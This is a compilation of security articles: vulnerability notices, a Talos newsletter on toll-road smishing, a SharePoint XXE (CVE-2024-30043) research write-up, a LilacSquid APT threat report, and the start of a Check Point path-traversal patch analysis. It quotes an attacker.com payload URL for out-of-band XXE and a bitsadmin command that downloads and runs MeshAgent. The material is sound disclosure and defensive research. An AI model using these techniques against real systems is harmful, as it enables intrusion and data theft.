CWE-88: IMPROPER NEUTRALIZATION OF ARGUMENT DELIMITERS IN A COMMAND ('ARGUMENT INJECTION')
LenelS2 NetBox access control and event monitoring system was discovered to contain an authenticated remote code execution in versions prior to and including 5.6.1, which allows an attacker to execute malicious commands.
CWE-78: IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN OS COMMAND ('OS COMMAND INJECTION')
LenelS2 NetBox access control and event monitoring system was discovered to contain an unauthenticated remote code execution in versions prior to and including 5.6.1, which allows an attacker to execute malicious commands with elevated permissions.
CWE-259: USE OF HARD-CODED PASSWORD
LenelS2 NetBox access control and event monitoring system was discovered to contain hard-coded credentials in versions prior to and including 5.6.1, which allows an attacker to bypass authentication requirements.
My wife (no stranger to weird types of scams) recently received a fake text message from someone claiming to be New Jerseyβs E-ZPass program saying that she had an outstanding balance from highway tolls that she owed, prompting her to visit a site so she could pay and avoid additional fines.Β
There was plenty of reason to believe this was a legitimate ask. Her family is from New Jersey, so we make frequent trips there, paying $20-plus in tolls along the way. We had also just completed a trip from there a few weeks prior (though Iβm not sure if this was a coincidence to the timing of the spam text or not), and we both have E-ZPass accounts.Β
For the uninitiated, or anyone who lives in a country where taxes are paid as normal and therefore pay for appropriate road repairs, E-ZPass is a small device drivers in more than a dozen countries in the U.S. can register for so they can automatically pay tolls along highways rather than having to stop and use cash or coins, or spending a few extra minutes manually processing a transaction.Β Β
Each state or city has its own agencies that deal with E-ZPass, each with its own payment processing system and website. For this case with New Jersey, the phishing site the scammers set up was shockingly convincing and looked remarkably similar to the legitimate New Jersey E-ZPass website.Β Β
Once we logged into our legitimate E-ZPass account to check to make sure we had, in fact, paid all the appropriate tolls, I alerted my team about this scam, and we appropriately blocked the phishing URL in question in Cisco Secure products.Β Β
Since this victory and foray into threat hunting, I have learned that this is a problem everywhere, not just for New Jersey drivers.Β
Since this experience, E-ZPass has sent out an alert in all the states they operate in warning about these types of scams. Drivers from New York to Georgia and Pennsylvania have received these types of texts with equally convincing phishing text messages and lure pages.Β Β
Itβs unclear what the adversariesβ goals are in this case, but itβs probably safe to assume theyβre looking to collect usersβ credit card information after they go in to pay the alleged overdue toll. They could also be collecting E-ZPass login information to collect further data about the drivers.Β
In April, the FBI also warned of SMS phishing scams, in which adversaries pretended to be toll collection services from three different U.S. states. SunPass, the equivalent to E-ZPass in Florida, also alerted about similar scams around the same time as these E-ZPass scams started being reported. And in March, the FasTrak service in California warned of the same problems.Β Β
My hunch is that these types of services are being impersonated all over the U.S. for several reasons β thousands of drivers use these services (especially in states with a high commuter population), which makes it likely that whoever receives the text will be familiar with these devices and will have recently driven on a highway that makes drivers pay tolls. The amounts theyβre asking for are also small, no more than $5 USD, so it doesnβt set off any immediate alarm bells, unlike similar scams that ask for hundreds of dollars for health care services. The requests coming through as SMS messages also make the targets more likely to open them on their mobile devices, which may not have the same security in place as a laptop or managed company device.Β
No individual state or local agency is immune from this style of scam, so if youβre ever in doubt of receiving a text like this, itβs best to call your area government program in question and ask them about any suspicious activity before clicking on any links or submitting payment information.Β
The one big thingΒ
Cisco Talosβ Vulnerability Research team has helped to disclose and patch more than 20 vulnerabilities over the past three weeks, including two in the popular Adobe Acrobat Reader software. Acrobat, one of the most popular PDF readers currently available, contains two out-of-bounds read vulnerabilities that could lead to the exposure of sensitive contents of arbitrary memory in the application. There are also eight vulnerabilities in a popular line of PLC CPU modules commonly used in automated environments. We have more detailed information in our full Vulnerability Roundup from this week.Β
Why do I care?Β
Several vulnerabilities were identified in the AutomationDirect P3 line of CPU modules. The P3-550E is the most recent CPU module released in the Productivity3000 line of Programmable Automation Controllers from AutomationDirect. The device communicates remotely via ethernet, serial and USB and exposes a variety of control services, including MQTT, Modbus, ENIP and the engineering workstation protocol DirectNET. Four of the vulnerabilities found in these PLC CPU modules received a CVSS security score of 9.8 out of 10, making them particularly notable. TALOS-2024-1942 (CVE-2024-21785) is a leftover debug code vulnerability that allow an adversary who can communicate to the device over ModbusRTU to enable the deviceβs diagnostic interface without any other knowledge of the target device. There is also TALOS-2024-1943 (CVE-2024-23601) which can lead to remote code execution if the attacker sends a specially crafted file to the targeted device and TALOS-2024-1939 (CVE-2024-24963 and CVE-2024-24962) which are stack-based buffer overflows that can also lead to remote code execution if the attacker sends a specially formatted packet to the device.Β
So now what?Β
Each of the vendors mentioned in this weekβs Vulnerability Roundup have released patches for affected products, and users should download these patches as soon as possible. For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligenceβs website.Β
Top security headlines of the weekΒ
Security researchers are warning about the dangers of a new AI βRecallβ feature for Microsoft Windows 11. Microsoft recently announced a new update, that will allow a computer to remember past actions taken by the user and then use a simple search to query that information (ex., βWhere did I store that document again?β). However, because Recall essentially takes individual snapshots of a machine and stores them locally, there are several security concerns. If an adversary were to infect a targeted machine with information-stealing malware, they could steal important databases stored locally and anything stored by Windows Recall. Recall also contains what are essentially keylogging functions, leaving the door open for adversaries to easily steal login credentials or other personal information that had been entered into the machine over the previous three months. The United Kingdomβs data protection agency has already contacted Microsoft inquiring about the way this information is stored and used, and theyβve asked for assurance that usersβ data will be properly safeguarded and not used by the company.Β Other unauthorized users may be able to access and query Recallβs information, should they obtain physical access to the device. (Bleeping Computer, Double Pulsar)Β
Popular spyware app pcTattletale had to completely shut down after a data breach and having its website seized. The company that operates the app, which quietly and remotely tracks usersβ activities on infected machines and takes screenshots, had its website defaced earlier this week by a hacker, along with a dump of data belonging to alleged pcTattletale customers and victims. Just days before the disruption, reports surfaced that the software was quietly installed on computers that handled the check-in process at least three Wyndham hotels across the U.S. A vulnerability in the platform could have allowed anyone on the internet who exploits it can download screenshots captured by the software directly from its servers. pcTattletale advertised itself as software that could allow anyone to control it remotely and view the targetβs Android or Windows devices and their data from anywhere in the world. The founder of the spyware said that, after the data breach, the company was βout of business and completely done.β The now-defunct app had 138,000 registered customers, according to data breach notification website Have I Been Pwned. (TechCrunch, TechCrunch (again))Β
Ascension hospitals across the U.S. still have to delay patient care more than three weeks after a cyber attack. As of earlier this week, the national hospital system is still experiencing network disruptions, forcing staff to write care notes by hand and deliver orders for tests and prescriptions in person. Patients have also been unable to use their online portals to contact their doctors or view their medical records. Ascension is one of the largest health systems in the U.S., with more than 140 hospitals across the country. It first alerted patients and doctors about βunusual activityβ on May 8, and there is no timeline for when services will be fully restored. News reports indicate that the disruption is a ransomware attack that can be attributed to the BlackBasta threat actor, which has links to Russia. Large health care organizations have increasingly become the target of ransomware attacks, with a previous campaign targeting Change Healthcare earlier this year disrupting payments to medical providers across the U.S. for weeks. (NPR, The New York Times)Β
Bill Largent from Talos' Strategic Communications team will be giving our annual "State of Cybersecurity" talk at Cisco Live on Tuesday, June 4 at 11 a.m. Pacific time. Jaeson Schultz from Talos Outreach will have a talk of his own on Thursday, June 6 at 8:30 a.m. Pacific, and there will be several Talos IR-specific lightning talks at the Cisco Secure booth throughout the conference.
Gergana Karadzhova-Dangela from Cisco Talos Incident Response will highlight the primordial importance of actionable incident response documentation for the overall response readiness of an organization. During this talk, she will share commonly observed mistakes when writing IR documentation and ways to avoid them. She will draw on her experiences as a responder who works with customers during proactive activities and actual cybersecurity breaches.Β
Most prevalent malware files from Talos telemetry over the past weekΒ
Yes, the title is right. This blog covers an XML eXternal Entity (XXE) injection vulnerability that I found in SharePoint. The bug was recently patched by Microsoft. In general, XXE vulnerabilities are not very exciting in terms of discovery and related technical aspects. They may sometimes be fun to exploit and exfiltrate data (or do other nasty things) in real environments, but in the vulnerability research world, you typically find them, report them, and forget about them.
So why am I writing a blog post about an XXE? I have two reasons:
Β·Β Β Β Β Β Β It affects SharePoint, both on-prem and cloud instances, which is a nice target. This vulnerability can be exploited by a low-privileged user. Β·Β Β Β Β Β Β This is one of the craziest XXEs that I have ever seen (and found), both in terms of vulnerability discovery and the method of triggering. When we talk about overall exploitation and impact, this Pwn2Own win by Chris Anastasio and Steven Seeley is still my favorite.
The vulnerability is known as CVE-2024-30043, and, as one would expect with an XXE, it allows you to:
Β·Β Β Β Β Β Β Read files with SharePoint Farm Service account permission. Β·Β Β Β Β Β Β Perform Server-side request forgery (SSRF) attacks. Β·Β Β Β Β Β Β Perform NTLM Relaying. Β·Β Β Β Β Β Β Achieve any other side effects to which XXE may lead.
Let us go straight to the details.
BaseXmlDataSource DataSource
Microsoft.SharePoint.WebControls.BaseXmlDataSource is an abstract base class, inheriting from DataSource, for data source objects that can be added to a SharePoint Page. DataSource can be included in a SharePoint page, in order to retrieve data (in a way specific to a particular DataSource). When a BaseXmlDataSource is present on a page, its Execute method will be called at some point during page rendering:
At [1], you can see the Execute method, which accepts a string called request. We fully control this string, and it should be a URL (or a path) pointing to an XML file. Later, I will refer to this string as DataFile.
At this point, we can derive this method into two main parts: XML fetching and XML parsing.
Β Β Β Β Β Β Β a) XML Fetching
At [2], this.FetchData is called and our URL is passed as an input argument. BaseXmlDataSource does not implement this method (itβs an abstract class).
FetchData is implemented in three classes that extend our abstract class: β’ SoapDataSource - performs HTTP SOAP request and retrieves a response (XML). β’ XmlUrlDataSource - performs a customizable HTTP request and retrieves a response (XML). β’ SPXmlDataSource - retrieves an existing specified file on the SharePoint site.
We will revisit those classes later.
Β Β Β Β Β Β Β b) XML Parsing
At [3], the xmlReaderSettings.DtdProcessing member is set to DtdProcessing.Prohibit, which should disable the processing of DTDs.
At [4] and [5], the xmlTextReader.XmlResolver is set to a freshly created XmlSecureResolver. The request string, which we fully control, is passed as the securityUrl parameter when creating the XmlSecureResolver
At [6], the code creates a new instance of XmlReader.
Finally, it reads the contents of the XML using a while-do loop at [7].
At first glance, this parsing routine seems correct. The document type definition (DTD) processing of our XmlReaderSettings instance is set to Prohibit, which should block all DTD processing. On the other hand, we have the XmlResolver set to XmlSecureResolver.
From my experience, it is very rare to see .NET code, where: β’ DTDs are blocked through XmlReaderSettings. β’ Some XmlResolver is still defined.
I decided to play around and sent in a general entity-based payload at some test code I wrote similar to the code shown above (I only replaced XmlSecureResolver with XmlUrlResolver for testing purposes):
As expected, no HTTP request was performed, and a DTD processing exception was thrown. What about this payload?
It was a massive surprise to me, but the HTTP request was performed! According to that, it seems that when you have .NET code where: β’ XmlReader is used with XmlTextReader and XmlReaderSettings. β’ XmlReaderSettings.DtdProcessing is set to Prohibit. β’ An XmlTextReader.XmlResolver is set.
The resolver will first try to handle the parameter entities, and only afterwards will perform the DTD prohibition check! An exception will be thrown in the end, but it still allows you to exploit the Out-of-Band XXE and potentially exfiltrate data (using, for example, an HTTP channel).
The XXE is there, but we have to solve two mysteries:
β’ How can we properly fetch the XML payload in SharePoint? β’ Whatβs the deal with this XmlSecureResolver?
XML Fetching and XmlSecureResolver
As I have already mentioned, there are 3 classes that extend our vulnerable BaseXmlDataSource. Their FetchData method is used to retrieve the XML content based on our URL. Then, this XML will be parsed with the vulnerable XML parsing code.
Letβs summarize those 3 classes:
Β Β Β Β Β Β Β a) XmlUrlDataSource
Β Β Β Β Β Β Β β’ Accepts URLs with a protocol set to either http or https. Β Β Β Β Β Β Β β’ Performs an HTTP request to fetch the XML content. This request is customizable. For example, we can select which HTTP method we want to use. Β Β Β Β Β Β Β β’ Some SSRF protections are implemented. This class wonβt allow you to make HTTP requests to local addresses such as 127.0.0.1 or 192.168.1.10. Still, you can use it freely to reach external IP address space.
Β Β Β Β Β Β Β b) SoapDataSource
Β Β Β Β Β Β Β β’ Almost identical to the first one, although it allows you to perform SOAP requests only (body must contain valid XML, plus additional restrictions). Β Β Β Β Β Β Β β’ The same SSRF protections exist as in XmlUrlDataSource.
Β Β Β Β Β Β Β c) SPXmlDataSource
Β Β Β Β Β Β Β β’ Allows retrieval of the contents of SharePoint pages or documents. If you have a file test.xml uploaded to the sample site, you can provide a URL as follows: /sites/sample/test.xml.
At this point, those HTTP-based classes look like a great match. We can: β’ Create an HTTP server. β’ Fetch malicious XML from our server. β’ Trigger XXE and potentially read files from SharePoint server.
Letβs test this. Iβm creating an XmlUrlDataSource, and I want it to fetch the XML from this URL:
Β Β Β Β Β Β Β http://attacker.com/poc.xml
poc.xml contains the following payload:
The plan is simple. I want to test the XXE by executing an HTTP request to the localhost (SSRF).
We must also remember that whatever URL that we specify as our source also becomes the securityUrl of the XmlSecureResolver. Accordingly, this is what will be executed:
Who cares anyway? YOLO and letβs move along with the exploitation. Unfortunately, this is the exception that appears when we try to execute this attack:
It seems that βSecureβ in XmlSecureResolver stands for something. In general, it is a wrapper around various resolvers, which allows you to apply some resource fetching restrictions. Here is a fragment of the Microsoft documentation:
βHelps to secure another implementation of XmlResolver by wrapping the XmlResolver object and restricting the resources that the underlying XmlResolver has access to.β
In general, it is based on Microsoft Code Access Security. Depending on the provided URL, it creates some resource access rules. Letβs see a simplified example for the http://attacker.com/test.xml:
In short, it creates restrictions based on protocol, hostname, and a couple of different things (like an optional port, which is not applicable to all protocols). If we fetch our XML from http://attacker.com, we wonβt be able to make a request to http://localhost because the host does not match.
The same goes for the protocol. If we fetch XML from the attackerβs HTTP server, we wonβt be able to access local files with XXE, because neither the protocol (http:// versus file://) nor the host match as required.
To summarize, this XXE is useless so far. Even though we can technically trigger the XXE, it only allows us to reach our own server, which we can also achieve with the intended functionalities of our SharePoint sources (such as XmlDataSource). We need to figure out something else.
SPXmlDataSource and URL Parsing Issues
At this point, I was not able to abuse the HTTP-based sources. I tried to use SPXmlDataSource with the following request:
Β Β Β Β Β Β Β /sites/mysite/test.xml
The idea is simple. We are a SharePoint user, and we can upload files to some sites. We upload our malicious XML to the http://sharepoint/sites/mysite/test.xml document and then we: Β Β Β Β Β Β Β β’ Create SPXmlDataSource Β Β Β Β Β Β Β β’ Set DataFile to /sites/mysite/test.xml.
SPXmlDataSource will successfully retrieve our XML. What about XmlSecureResolver? Unfortunately, such a path (without a protocol) will lead to a very restrictive policy, which does not allow us to leverage this XXE.
It made me wonder about the URL parsing. I knew that I could not abuse HTTP-based XmlDataSource and SoapDataSource. The code was written in C# and it was pretty straightforward to read β URL parsing looked good there. On the other hand, the URL parsing of SPXmlDataSource is performed by some unmanaged code, which cannot be easily decompiled and read.
I started thinking about a following potential exploitation scenario: Β Β Β Β Β Β Β β’ Delivering a βmalformedβ URL. Β Β Β Β Β Β Β β’ SPXmlDataSource somehow manages to handle this URL, and retrieves my uploaded XML successfully. Β Β Β Β Β Β Β β’ The URL gives me an unrestricted XmlSecureResolver policy and Iβm able to fully exploit XXE.
This idea seemed good, and I decided to investigate the possibilities. First, we have to figure out when XmlSecureResolver gives us a nice policy, which allows us to: Β Β Β Β Β Β Β β’ Access a local file system (to read file contents). Β Β Β Β Β Β Β β’ Perform HTTP communication to any server (to exfiltrate data).
Letβs deliver the following URL to XmlSecureResolver:
Β Β Β Β Β Β Β file://localhost/c$/whatever
Bingo! XmlSecureResolver creates a policy with no restrictions! It thinks that we are loading the XML from the local file system, which means that we probably already have full access, and we can do anything we want.
Such a URL is not something that we should be able to deliver to SPXmlDataSource or any other data source that we have available. None of them is based on the local file system, and even if they were, we are not able to upload files there.
Still, we donβt know how SPXmlDataSource is handling URLs. Maybe my dream attack scenario with a malformed URL is possible? Before even trying to reverse the appropriate function, I started playing around with this SharePoint data source, and surprisingly, I found a solution quickly:
Letβs see how SPXmlDataSource handles it (based on my observations):
This is awesome. Such a URL allows us to retrieve the XML that we can freely upload to SharePoint. On the other hand, it gives us an unrestricted access policy in XmlSecureResolver! This URL parsing confusion between those two components gives us the possibility to fully exploit the XXE and perform a file read.
The entire attack scenario looks like this:
Demo
Letβs have a look at the demo, to visualize things better. It presents the full exploitation process, together with the debugger attached. You can see that: Β Β Β Β Β Β Β β’ SPXmlDataSource fetches the malicious XML file, even though the URL is malformed. Β Β Β Β Β Β Β β’ XmlSecureResolver creates an unrestricted access policy. Β Β Β Β Β Β Β β’ XXE is exploited and we retrieve the win.ini file. Β Β Β Β Β Β Β β’ βDTD prohibitedβ exception is eventually thrown, but we were still able to abuse the OOB XXE.
The Patch
The patch from Microsoft implemented two main changes: Β Β Β Β Β Β Β β’ More URL parsing controls for SPXmlDataSource. Β Β Β Β Β Β Β β’ XmlTextReader object also prohibits DTD usage (previously, only XmlReaderSettings did that).
In general, I find .NET XXE-protection settings way trickier than the ones that you can define in various Java parsers. This is because you can apply them to objects of different types (here: XmlReaderSettings versus XmlTextReader). When XmlTextReader prohibits the DTD usage, parameter entities seem to never be resolved, even with the resolver specified (thatβs how this patch works). On the other hand, when XmlReaderSettings prohibits DTDs, parameter entities are resolved when the XmlUrlResolver is used. You can easily get confused here.
Summary
A lot of us thought that XXE vulnerabilities were almost dead in .NET. Still, it seems that you may sometimes spot some tricky implementations and corner cases that may turn out to be vulnerable. A careful review of .NET XXE-related settings is not an easy task (they are tricky) but may eventually be worth a shot.
I hope you liked this writeup. I have a huge line of upcoming blog posts, but vulnerabilities are waiting for the patches (including one more SharePoint vulnerability). Until my next post, you can follow me @chudypb and follow the team on Twitter, Mastodon, LinkedIn, or Instagram for the latest in exploit techniques and security patches.
By Anna Bennett, Nicole Hoffman, Asheer Malhotra, Sean Taylor and Brandon White.Β
Cisco Talos is disclosing a new suspected data theft campaign, active since at least 2021, we attribute to an advanced persistent threat actor (APT) weβre calling βLilacSquid.βΒ Β
LilacSquidβs victimology includes a diverse set of victims consisting of information technology organizations building software for the research and industrial sectors in the United States, organizations in the energy sector in Europe and the pharmaceutical sector in Asia indicating that the threat actor (TA) may be agnostic of industry verticals and trying to steal data from a variety of sources.Β Β
This campaign uses MeshAgent, an open-source remote management tool, and a customized version of QuasarRAT weβre calling βPurpleInkβ to serve as the primary implants after successfully compromising vulnerable application servers exposed to the internet.Β Β
This campaign leverages vulnerabilities in public-facing application servers and compromised remote desktop protocol (RDP) credentials to orchestrate the deployment of a variety of open-source tools, such as MeshAgent and SSF, alongside customized malware, such as "PurpleInk," and two malware loaders we are calling "InkBox" and "InkLoader.βΒ Β
The campaign is geared toward establishing long-term access to compromised victim organizations to enable LilacSquid to siphon data of interest to attacker-controlled servers.Β
LilacSquid β An espionage-motivated threat actorΒ
Talos assesses with high confidence that this campaign has been active since at least 2021 and the successful compromise and post-compromise activities are geared toward establishing long-term access for data theft by an advanced persistent threat (APT) actor we are tracking as "LilacSquid" and UAT-4820. Talos has observed at least three successful compromises spanning entities in Asia, Europe and the United States consisting of industry verticals such as pharmaceuticals, oil and gas, and technology.Β
Previous intrusions into software manufacturers, such as the 3CX and X_Trader compromises by Lazarus, indicate that unauthorized long-term access to organizations that manufacture and distribute popular software for enterprise and industrial organizations can open avenues of supply chain compromise proving advantageous to threat actors such as LilacSquid, allowing them to widen their net of targets. Β
We have observed two different types of initial access techniques deployed by LilacSquid, including exploiting vulnerabilities and the use of compromised remote desktop protocol (RDP) credentials. Post-exploitation activity in this campaign consists of the deployment of MeshAgent, an open-source remote management and desktop session application, and a heavily customized version of QuasarRAT that we track as βPurpleInkβ allowing LilacSquid to gain complete control over the infected systems. Additional means of persistence used by LilacSquid include the use of open-source tools such as Secure Socket Funneling (SSF), which is a tool for proxying and tunneling multiple sockets through a single secure TLS tunnel to a remote computer.Β
It is worth noting that multiple tactics, techniques, tools and procedures (TTPs) utilized in this campaign bear some overlap with North Korean APT groups, such as Andariel and its parent umbrella group, Lazarus. Public reporting has noted Andarielβs use of MeshAgent as a tool for maintaining post-compromise access after successful exploitation. Furthermore, Talos has observed Lazarus extensively use SOCKs proxy and tunneling tools, along with custom-made malware as part of their post-compromise playbooks to act as channels of secondary access and exfiltration. This tactic has also been seen in this campaign operated by LilacSquid where the threat actor deployed SSF along with other malware to create tunnels to their remote servers.Β
LilacSquidβs infection chainsΒ
There are primarily two types of infection chains that LilacSquid uses in this campaign. The first involves the successful exploitation of a vulnerable web application, while the other is the use of compromised RDP credentials. Successful compromise of a system leads to LilacSquid deploying multiple vehicles of access onto compromised hosts, including dual-use tools such as MeshAgent, Secure Socket Funneling (SSF), InkLoader and PurpleInk.Β
Successful exploitation of the vulnerable application results in the attackers deploying a script that will set up working directories for the malware and then download and execute MeshAgent from a remote server. On execution, MeshAgent will connect to its C2, carry out preliminary reconnaissance and begin downloading and activating other implants on the system, such as SSF and PurpleInk.Β
MeshAgent is typically downloaded by the attackers using the bitsadmin utility and then executed to establish contact with the C2:Β
bitsadmin /transfer -job_name- /download /priority normal -remote_URL- -local_path_for_MeshAgent-Β
-local_path_for_MeshAgent- connectΒ
Instrumenting InkLoader β Modularizing the infection chainΒ
When compromised RDP credentials were used to gain access, the infection chain was altered slightly. LilacSquid chose to either deploy MeshAgent and subsequent implants, or introduce another component in the infection preceding PurpleInk. Β
InkLoader is a simple, yet effective DOT NET-based malware loader. It is written to run a hardcoded executable or command. In this infection chain, InkLoader is the component that persists across reboots on the infected host instead of the actual malware it runs. So far, we have only seen PurpleInk being executed via InkLoader, but LilacSquid may likely use InkLoader to deploy additional malware implants.Β
Talos observed LilacSquid deploy InkLoader in conjunction with PurpleInk only when they could successfully create and maintain remote sessions via remote desktop (RDP) by exploiting the use of stolen credentials to the target host. A successful login via RDP leads to the download of InkLoader and PurpleInk, copying these artifacts into desired directories on disk and the subsequent registration of InkLoader as a service that is then started to deploy InkLoader and, in turn, PurpleInk. The infection chain can be visualized as:Β
Service creation and execution on the endpoint is typically done via the command line interface using the commands:Β
PurpleInk, LilacSquidβs primary implant of choice, has been adapted from QuasarRAT, a popular remote access trojan family. Although QuasarRAT has been available to threat actors since at least 2014, we observed PurpleInk being actively developed starting in 2021 and continuing to evolve its functionalities separate from its parent malware family.Β Β
PurpleInk uses an accompanying configuration file to obtain information such as the C2 serverβs address and port. This file is typically base64-decoded and decrypted to obtain the configuration strings required by PurpleInk.Β
PurpleInk is a highly versatile implant that is heavily obfuscated and contains a variety of RAT capabilities. Talos has observed multiple variants of PurpleInk where functionalities have both been introduced and removed.Β
In terms of RAT capabilities, PurpleInk can perform the following actions on the infected host:Β
Enumerate the process and send the process ID, name and associated Window Title to the C2.Β
Terminate a process ID (PID) specified by the C2 on the infected host.Β
Run a new application on the host β start process.Β
Get drive information for the infected host, such as volume labels, root directory names, drive type and drive format.Β
Enumerate a given directory to obtain underlying directory names, file names and file sizes.Β
Read a file specified by the C2 and exfiltrate its contents.Β
Replace or append content to a specified file.Β
Gather system information about the infected host using WMI queries. Information includes:Β Β
Information retrievedΒ
WMI query and output usedΒ
Processor nameΒ
SELECT * FROM Win32_ProcessorΒ
Memory (RAM) size in MBΒ
Select * From Win32_ComputerSystem | TotalPhysicalMemoryΒ
Video Card (GPU)Β
SELECT * FROM Win32_DisplayConfiguration | DescriptionΒ
UsernameΒ
Current usernameΒ
Computer nameΒ
Infected hostβs nameΒ
Domain nameΒ
Domain of the infected hostΒ
Host nameΒ
NetBIOS Host nameΒ
System driveΒ
Root system driveΒ
System directoryΒ
System directory of the infected hostΒ
Computer uptimeΒ
Calculate uptime from current time and SELECT * FROM Win32_OperatingSystem WHERE Primary='true' | LastBootUpTimeΒ
MAC addressΒ
By enumerating Network interfaces on the endpointΒ
LAN IP addressΒ
By enumerating Network interfaces on the endpointΒ
WAN IP addressΒ
None β not retrieved or calculated β empty string sent to C2.Β
Antivirus software nameΒ
Not calculated β defaults to βNoInfoβΒ
FirewallΒ
Not calculated β defaults to βNoInfoβΒ
Time zoneΒ
Not calculated β an empty string is sent to the C2.Β
CountryΒ
Not calculated β an empty string is sent to the C2.Β
ISPΒ
Not calculated β an empty string is sent to the C2.Β
Start a remote shell on the infected host using β cmd[.]exe /K β.Β
Rename or move directories and files and then enumerate them.Β
Delete files and directories specified by the C2.Β
Connect to a specified remote address, specified by the C2. This remote address referenced as βFriendβ internally is the reverse proxy host indicating that PurpleInk can act as an intermediate proxy tool.Β
PurpleInk has the following capabilities related to communicating with its βfriendsβ (proxy servers):Β
Connect to a new friend whose remote address is specified by the C2.Β
Send data to a new or existing friend.Β
Disconnect from a specified friend.Β
Receive data from another connected friend and process it.Β
Another PurpleInk variant, built and deployed in 2023 and 2024, consists of limited functionalities, with much of its capabilities stripped out. The capabilities that still reside in this variant are the abilities to:Β
Close all connections to proxy servers.Β
Create a reverse shell. Β
Connect and send/receive data from connected proxies.Β
Functionalities, such as file management, execution and gathering system information, have been stripped out of this variant of PurpleInk, but can be supplemented by the reverse shell carried over from previous variants, which can be used to carry out these tasks on the infected endpoint. Adversaries frequently strip, add and stitch together functionalities to reduce their implantβs footprint on the infected system to avoid detection or to improve their implementations to remove redundant capabilities.Β Β
InkBox β Custom loader observed in older attacksΒ
InkBox is a malware loader that will read from a hardcoded file path on disk and decrypt its contents. The decrypted content is another executable assembly that is then run by invoking its Entry Point within the InkBox process. This second assembly is the backdoor PurpleInk. The overall infection chain in this case is:Β
The usage of InkBox to deploy PurpleInk is an older technique used by LilacSquid since 2021. Since 2023, the threat actor has produced another variant of the infection chain where they have modularized the infection chain so that PurpleInk can now run as a separate process. However, even in this new infection chain, PurpleInk is still run via another component that we call "InkLoader.βΒ Β
LilacSquid employs MeshAgentΒ
In this campaign, LilacSquid has extensively used MeshAgent as the first stage of their post-compromise activity. MeshAgent is the agent/client from the MeshCentral, an open-source remote device management software. The MeshAgent binaries typically use a configuration file, known as an MSH file. The MSH files in this campaign contain information such as MeshName (victim identifier in this case) and C2 addresses:Β
Being a remote device management utility, MeshAgent allows an operator to control almost all aspects of the device via the MeshCentral server, providing capabilities such as:Β
List all devices in the Mesh (list of victims).Β
View and control desktop.Β
Manage files on the system.Β
View software and hardware information about the device.Β Β
Post-exploitation, MeshAgent activates other dual-use and malicious tools on the infected systems, such as SSF and PurpleInk.Β Β
CoverageΒ
Ways our customers can detect and block this threat are listed below.Β
Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.Β Β Β
Cisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these attacks.Β Β
Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.Β Β
Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.Β Β
Umbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network. Sign up for a free trial of Umbrella here.Β Β
Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.Β Β
Additional protection with context to your specific environment and threat data are available from the Firewall Management Center. Β
Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.Β
Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.Β Β
IOCs
IOCs for this research can also be found at our GitHub repository here.Β
Gather round, gather round - itβs time for another blogpost tearing open an SSLVPN appliance and laying bare a recent in-the-wild exploited bug. This time, it is Check Point who is the focus of our penetrative gaze.
Check Point, for those unaware, is the vendor responsible for the 'CloudGuard Network Security' appliance, yet another device claiming to be secure and hardened. Their slogan - "you deserve the best security" - implies they are a company you can trust with the security of your network. A bold claim.
To see if Check Point really does deliver the security that their customers deserve - the best security - we thought we'd take a look inside their appliance, and we recently got a great opportunity to do so, in the shape of CVE-2024-24919. This is a 'high' priority bug, which (according to the CVE itself) falls under the category of Exposure of Sensitive Information to an Unauthorized Actor. Check Point advise that the bug is under active exploitation, and give the following summary (among other advice):
The vulnerability potentially allows an attacker to read certain information on Gateways once connected to the Internet and enabled with Remote Access VPN or Mobile Access.
No bug class here, just a very vague and hand-wavey description. We wondered exactly what 'certain information' meant, in this context - does it mean we can read session tokens? Or the configuration of the device? Password hashes? (spoiler: it's actually much worse than this). There wasn't much information floating around the Internet about the bug, so we set out to find out just how bad it is, so that we could share details with device administrators who need to make that all-important patch-or-no-patch decision.
Patch-Diffing time
This bug seems like a prime candidate for patch-diffing, in which the vulnerable and the patched systems are compared to reveal details about the patch itself, and thus the bug.
As ever, the first hurdle in this is obtaining the patched version of the software. While the patches linked from the advisory are locked behind a login form, we found the appliance itself would fetch patches without any credentials, and so we duly installed the patch and cataloged the resultant files, in order to compare each and every file with its pre-patch brethren.
We didnβt need to go to such lengths, though, as examining the appliance filesystem, we soon found the .tgz file containing the update itself inside a temporary directory. Great! Popping it open, we found a load of boring installation scripts, and a promising-sounding file named sslvpn.full , an ELF binary. At least we donβt need to stare at brain-numbing PHP code this time - itβs a binary file so we get to look at lovely x86 disassembly instead. Yummy.
We duly threw the vulnerable and patched versions of the file into IDA, and used Diaphora to observe the differences. Right away, something stood out to us (vulnerable code is on the left, patched on the right):
Hurm, interesting - new code has been added, which is logging the string βSuspected path traversal attack fromβ. It seems a pretty safe bet that the bug is actually a path traversal.
Poking around in the code, we can see that a new logging function has been added, named send_path_traversal_alert_log , and if we look just a little bit deeper, we also find the new function sanitize_filename , which calls the new logging function. If we look at what references sanitize_filename itself, we are presented with a single caller - a large function that has the autogenerated name sub_80F09E0. If we search again for references to this large function, our persistence is rewarded, as we find it is passed to the function cpHttpSvc_register_query along with the HTTP path /clients/MyCRL, strongly implying it is the handler for this endpoint.
This is great - weβre only a few minutes into our analysis, and already weβve discovered some vital clues! Firstly, we are pretty sure weβre looking for a path traversal bug, and secondly, weβve got a strong suspicion that it affects the endpoint /clients/MyCRL.
A little investigation reveals that this endpoint is designed to serve static files from a location on the filesystem. The files can be specified via the URI itself, in the form of /clients/MyCRL/file_to_get, or via the POST body. We experimented with this somewhat, and found some interesting-but-useless weirdness in the server - adding certain control characters into the URL (such as /clients/MyCRL/test%0Atest) would hang the request, and the error handling that detected escaped NULL bytes seemed questionable, too, as parts of the request servicing code would be executed despite dire warnings generated in the log. Nothing we tried in the URL path generated anything that looked like a controlled file read, though.
